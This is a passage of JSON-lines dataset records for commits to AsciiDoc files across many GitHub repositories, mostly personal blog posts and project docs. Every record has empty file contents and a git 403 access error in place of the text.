lasticsearch,coding0011\/elasticsearch,davidvgalbraith\/elasticsearch,MaineC\/elasticsearch,MichaelLiZhou\/elasticsearch,golubev\/elasticsearch,lks21c\/elasticsearch,Collaborne\/elasticsearch,jimczi\/elasticsearch,kkirsche\/elasticsearch,shreejay\/elasticsearch,jango2015\/elasticsearch,drewr\/elasticsearch,masterweb121\/elasticsearch,pablocastro\/elasticsearch,EasonYi\/elasticsearch,janmejay\/elasticsearch,MichaelLiZhou\/elasticsearch,liweinan0423\/elasticsearch,mcku\/elasticsearch,JervyShi\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,ESamir\/elasticsearch,lmtwga\/elasticsearch,sscarduzio\/elasticsearch,phani546\/elasticsearch,abhijitiitr\/es,avikurapati\/elasticsearch,pranavraman\/elasticsearch,elancom\/elasticsearch,jw0201\/elastic,vietlq\/elasticsearch,nazarewk\/elasticsearch,rmuir\/elasticsearch,vrkansagara\/elasticsearch,Asimov4\/elasticsearch,overcome\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,njlawton\/elasticsearch,mcku\/elasticsearch,apepper\/elasticsearch,Rygbee\/elasticsearch,amit-shar\/elasticsearch,kevinkluge\/elasticsearch,wittyameta\/elasticsearch,Shekharrajak\/elasticsearch,kevinkluge\/elasticsearch,kalburgimanjunath\/elasticsearch,mikemccand\/elasticsearch,palecur\/elasticsearch,jw0201\/elastic,Fsero\/elasticsearch,diendt\/elasticsearch,hechunwen\/elasticsearch,diendt\/elasticsearch,KimTaehee\/elasticsearch,ouyangkongtong\/elasticsearch,rhoml\/elasticsearch,boliza\/elasticsearch,luiseduardohdbackup\/elasticsearch,wenpos\/elasticsearch,vingupta3\/elasticsearch,TonyChai24\/ESSource,rlugojr\/elasticsearch,Shepard1212\/elasticsearch,kubum\/elasticsearch,franklanganke\/elasticsearch,Uiho\/elasticsearch,Chhunlong\/elasticsearch,ajhalani\/elasticsearch,ulkas\/elasticsearch,kkirsche\/elasticsearch,hafkensite\/elasticsearch,onegambler\/elasticsearch,sreeramjayan\/elasticsearch,tebriel\/elasticsearch,diendt\/elasticsearch,dpursehouse\/elasticsearch,Brijeshrpatel9\/elasticsearch,jprante\/elasticsearch,jimhooker2002\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,apepper\/elasticsearch,AndreKR\/elasticsearch,sreeramjayan\/elasticsearch,javachengwc\/elasticsearch,JervyShi\/elasticsearch,HarishAtGitHub\/elasticsearch,Widen\/elasticsearch,bawse\/elasticsearch,jsgao0\/elasticsearch,jsgao0\/elasticsearch,amaliujia\/elasticsearch,kubum\/elasticsearch,rajanm\/elasticsearch,fooljohnny\/elasticsearch,ivansun1010\/elasticsearch,beiske\/elasticsearch,ImpressTV\/elasticsearch,zhaocloud\/elasticsearch,sdauletau\/elasticsearch,NBSW\/elasticsearch,beiske\/elasticsearch,ydsakyclguozi\/elasticsearch,MjAbuz\/elasticsearch,acchen97\/elasticsearch,lzo\/elasticsearch-1,brwe\/elasticsearch,mikemccand\/elasticsearch,Ansh90\/elasticsearch,opendatasoft\/elasticsearch,Siddartha07\/elasticsearch,SergVro\/elasticsearch,adrianbk\/elasticsearch,Stacey-Gammon\/elasticsearch,PhaedrusTheGreek\/elasticsearch,caengcjd\/elasticsearch,dantuffery\/elasticsearch,aglne\/elasticsearch,djschny\/elasticsearch,hirdesh2008\/elasticsearch,nazarewk\/elasticsearch,IanvsPoplicola\/elasticsearch,koxa29\/elasticsearch,wbowling\/elasticsearch,mohit\/elasticsearch,JSCooke\/elasticsearch,humandb\/elasticsearch,yuy168\/elasticsearch,micpalmia\/elasticsearch,truemped\/elasticsearch","old_file":"docs\/reference\/mapping\/types\/core-types.asciidoc","new_file":"docs\/reference\/mapping\/types\/core-types.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"204d97ffbfff8c9671e6f1aca0741362645faca1","subject":"y2b create post What's in my bag? (Tech Edition)","message":"y2b create post What's in my bag? (Tech Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-08-03-Whats-in-my-bag-Tech-Edition.adoc","new_file":"_posts\/2014-08-03-Whats-in-my-bag-Tech-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7857528a5570fe0e7d58abb3e1683dbd617c40c3","subject":"Update 2017-06-30-First-work-of-my-data-sience.adoc","message":"Update 2017-06-30-First-work-of-my-data-sience.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bad601ec0de1c52dae696d590d4d2a335f688d1c","subject":"Update 2015-11-14-Curriculos-e-programacao.adoc","message":"Update 2015-11-14-Curriculos-e-programacao.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-14-Curriculos-e-programacao.adoc","new_file":"_posts\/2015-11-14-Curriculos-e-programacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f7717a45815f73a69330d8e19c73038a5863c1","subject":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","message":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b91141e069d0b3634b007450b9fa389bb1cb3b73","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"aa05dbc0be15feffa9137ebe18b5ac4cae751537","subject":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","message":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14756984fd51d4934e0fdac3bf87e970a8f50378","subject":"Document release process for 3.0.x","message":"Document release process for 3.0.x\n\nIssueh gh-2036\n","repos":"vpavic\/spring-session,vpavic\/spring-session,vpavic\/spring-session","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vpavic\/spring-session.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad718f0a947b1bda3186a4dcc0b527b00f636738","subject":"Update 2015-06-28-Binary-matrix-effect-in-blue.adoc","message":"Update 2015-06-28-Binary-matrix-effect-in-blue.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-06-28-Binary-matrix-effect-in-blue.adoc","new_file":"_posts\/2015-06-28-Binary-matrix-effect-in-blue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17a5bf6006b7438e27a86a51e035c043dec18852","subject":"y2b create post The iPhone Notification Case!","message":"y2b create post The iPhone Notification Case!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-24-The-iPhone-Notification-Case.adoc","new_file":"_posts\/2016-04-24-The-iPhone-Notification-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1260b9c7a56f0262ba59c2b6d0d139f0b2955539","subject":"lab 05 v2","message":"lab 05 v2\n","repos":"dm-academy\/aitm-labs,dm-academy\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-05\/05-tech-lab-V2.adoc","new_file":"Lab-05\/05-tech-lab-V2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dm-academy\/aitm-labs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"455da341944625ed5819efe216924e601114b04e","subject":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1925d060d12691e63c13eae0203dc9b5c754a94c","subject":"Update 2018-09-30-Microservices-With-Nodejs.adoc","message":"Update 2018-09-30-Microservices-With-Nodejs.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2018-09-30-Microservices-With-Nodejs.adoc","new_file":"_posts\/2018-09-30-Microservices-With-Nodejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f87c835eefb3fb3b1c6ca0269ea74164a863966","subject":"Publish DS_Store-Breizhcamp-Saison-5.adoc","message":"Publish DS_Store-Breizhcamp-Saison-5.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-Breizhcamp-Saison-5.adoc","new_file":"DS_Store-Breizhcamp-Saison-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bee572c23dd633beb3e265df16ab08c210ff864","subject":"add documentation","message":"add documentation\n","repos":"Kronos-Integration\/kronos-service-admin,Kronos-Integration\/kronos-service-manager-admin","old_file":"doc\/api.adoc","new_file":"doc\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-service-manager-admin.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b820f79ee79cc178759b6073a35a9513bc67ed63","subject":"Update 2015-11-17-Projeto-Homens-Libertem-se.adoc","message":"Update 2015-11-17-Projeto-Homens-Libertem-se.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-17-Projeto-Homens-Libertem-se.adoc","new_file":"_posts\/2015-11-17-Projeto-Homens-Libertem-se.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f391ff58760efa9f0b5d55dd79c4886626fa5c8f","subject":"y2b create post Ever Tried Bone Conduction?","message":"y2b create post Ever Tried Bone Conduction?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-09-Ever-Tried-Bone-Conduction.adoc","new_file":"_posts\/2016-05-09-Ever-Tried-Bone-Conduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"215326b6ff05e4f316a77eed0d50d66736fd63fa","subject":"Update 2016-06-24-Midterm-Lets-go-to-O-H-M-B.adoc","message":"Update 
2016-06-24-Midterm-Lets-go-to-O-H-M-B.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-06-24-Midterm-Lets-go-to-O-H-M-B.adoc","new_file":"_posts\/2016-06-24-Midterm-Lets-go-to-O-H-M-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06169aaa2c9b578de8b77fbc11b5103e51ba844d","subject":"Update 2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","message":"Update 2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6335e7dd759fc217a22935769e677602bed9abd6","subject":"Update 2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","message":"Update 2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","new_file":"_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5d38a856b07e6bd548176295d13064de2356d06","subject":"Update README.adoc","message":"Update 
README.adoc","repos":"huunhancit\/spring-xd-samples,viveksd87\/spring-xd-samples,viveksd87\/spring-xd-samples,spring-projects\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,ghillert\/spring-xd-samples,felipeg48\/spring-xd-samples,constantlearner\/spring-xd,trisberg\/spring-xd-samples,rajkumargithub\/spring-xd-samples,constantlearner\/spring-xd,trisberg\/spring-xd-samples,rajkumargithub\/spring-xd-samples,ghillert\/spring-xd-samples,trisberg\/spring-xd-samples,morfeo8marc\/spring-xd-samples,ghillert\/spring-xd-samples,ghillert\/spring-xd-samples,spring-projects\/spring-xd-samples,huunhancit\/spring-xd-samples,viveksd87\/spring-xd-samples,felipeg48\/spring-xd-samples,rajkumargithub\/spring-xd-samples,trisberg\/spring-xd-samples,huunhancit\/spring-xd-samples,trisberg\/spring-xd-samples,morfeo8marc\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,spring-projects\/spring-xd-samples,felipeg48\/spring-xd-samples,constantlearner\/spring-xd,felipeg48\/spring-xd-samples,spring-projects\/spring-xd-samples,huunhancit\/spring-xd-samples,felipeg48\/spring-xd-samples,felipeg48\/spring-xd-samples,morfeo8marc\/spring-xd-samples,rajkumargithub\/spring-xd-samples,morfeo8marc\/spring-xd-samples,morfeo8marc\/spring-xd-samples,huunhancit\/spring-xd-samples,ghillert\/spring-xd-samples,constantlearner\/spring-xd,spring-projects\/spring-xd-samples,morfeo8marc\/spring-xd-samples,viveksd87\/spring-xd-samples,rajkumargithub\/spring-xd-samples,trisberg\/spring-xd-samples,spring-projects\/spring-xd-samples,rajkumargithub\/spring-xd-samples,ghillert\/spring-xd-samples","old_file":"analytics-pmml\/README.adoc","new_file":"analytics-pmml\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/constantlearner\/spring-xd.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62ab127ed182185d26045e1d29a44cd6a40df2ab","subject":"Initial proposal on migrating to CRDs (#3231)","message":"Initial proposal on migrating to CRDs (#3231)\n\n* Initial proposal on migrating to CRDs\r\n* Update proposal based on review feedback\r\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design\/proposals\/crdification.adoc","new_file":"documentation\/design\/proposals\/crdification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3fb770438184d56164af76e8552731c30a7a4d13","subject":"Renamed '_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc' to '_posts\/2016-05-23-ASCIIDOC-Ascii-Doc-cheatsheet.adoc'","message":"Renamed '_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc' to '_posts\/2016-05-23-ASCIIDOC-Ascii-Doc-cheatsheet.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-23-ASCIIDOC-Ascii-Doc-cheatsheet.adoc","new_file":"_posts\/2016-05-23-ASCIIDOC-Ascii-Doc-cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3a2f8fd1054b46ca7e98c74bfc6d6aa637db776","subject":"Update 2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","message":"Update 2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","new_file":"_posts\/2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54724ea47c7b709188fadbadd8d0c21bd291b150","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84d925456d6f7019db92c6b3f565d194bd859d41","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46329d39e56bb32d7ed3870b69af9c8c270c077d","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"feb89adea71b4140e435a29da3bfa70e325978d8","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"f1838f0bee615a8ed797b5db55d87cbcf7d0b23a","subject":"y2b create post Motorola Mystery Box Unboxing","message":"y2b create post Motorola Mystery Box Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-02-26-Motorola-Mystery-Box-Unboxing.adoc","new_file":"_posts\/2015-02-26-Motorola-Mystery-Box-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a42a6baf018bb3b7cefe1efee4aebfdb74d7feb8","subject":"Publish 2011-10-112-Peak-Java.adoc","message":"Publish 2011-10-112-Peak-Java.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"2011-10-112-Peak-Java.adoc","new_file":"2011-10-112-Peak-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f6d2718b3f9d09bb8faa5b585cd884bb2ddc909","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6875ab1f2eee199b87da636660793a898f5b60a1","subject":"created guide for crimping RJ-45 cables","message":"created guide for crimping RJ-45 cables\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Cable-Crimping\/README.adoc","new_file":"Cable-Crimping\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"41465f92a33d476dda4cad9534154b02378d23c1","subject":"copy releasenotes to master","message":"copy releasenotes to master\n","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"releasenotes_1.21.0.adoc","new_file":"releasenotes_1.21.0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appNG\/appng.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe793c64c18c65722cc175e774ee0ab4203d239a","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 
2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46b1fb78c06d735da7db9570321c433be552803b","subject":"Update 2017-05-03-Server-Virtualization-Management-Part3.adoc","message":"Update 2017-05-03-Server-Virtualization-Management-Part3.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-05-03-Server-Virtualization-Management-Part3.adoc","new_file":"_posts\/2017-05-03-Server-Virtualization-Management-Part3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1723c016f12a69a17ebc9c789116fae9b84b45b5","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73faf7298db4c7ebd61d12777e56dce8d1d6d652","subject":"Added description of request extension functions and warning about not installing in directory containing spaces","message":"Added description of request extension functions and warning about not installing in directory containing spaces\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 